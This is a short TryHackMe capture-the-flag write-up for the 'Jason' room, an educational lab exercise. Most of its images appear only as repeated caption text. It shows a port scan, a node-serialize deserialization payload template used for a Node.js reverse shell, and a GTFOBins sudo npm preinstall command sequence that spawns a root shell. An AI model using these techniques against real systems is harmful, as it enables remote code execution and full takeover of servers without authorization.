Complete TryHackMe Jason Room Writeup

TryHackMe Jason Room
TryHackMe Jason Room

TryHackMe Jason

We are Horror LLC TryHackMe Jason, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!

In JavaScript everything is a terrible mistake.

Thanks to @Luma for testing the room.

THM Jason
THM Jason

Scan the machine

rustscan -a 10.10.44.51
Complete TryHackMe Jason Room Writeup

Investigate Web server

firefox http://10.10.44.51
Complete TryHackMe Jason Room Writeup

Analise Source Code

Complete TryHackMe Jason Room Writeup

Investigate Requests

Complete TryHackMe Jason Room Writeup
10.10.82.11

Get a reverse Shell

nodejs reverse shell
nodejs reverse shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}

Complete TryHackMe Jason Room Writeup
Complete TryHackMe Jason Room Writeup
Complete TryHackMe Jason Room Writeup

Get User Flag

cat /home/dylan/user.txt
Complete TryHackMe Jason Room Writeup

Escalate Privileges

Complete TryHackMe Jason Room Writeup

Search for npm on GTFO Bins and we have

Complete TryHackMe Jason Room Writeup

export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
Complete TryHackMe Jason Room Writeup

Get Root Flag

cat /root/root.txt
Complete TryHackMe Jason Room Writeup

Room THM Jason

NodeJs Shell Generator

Related Posts

Index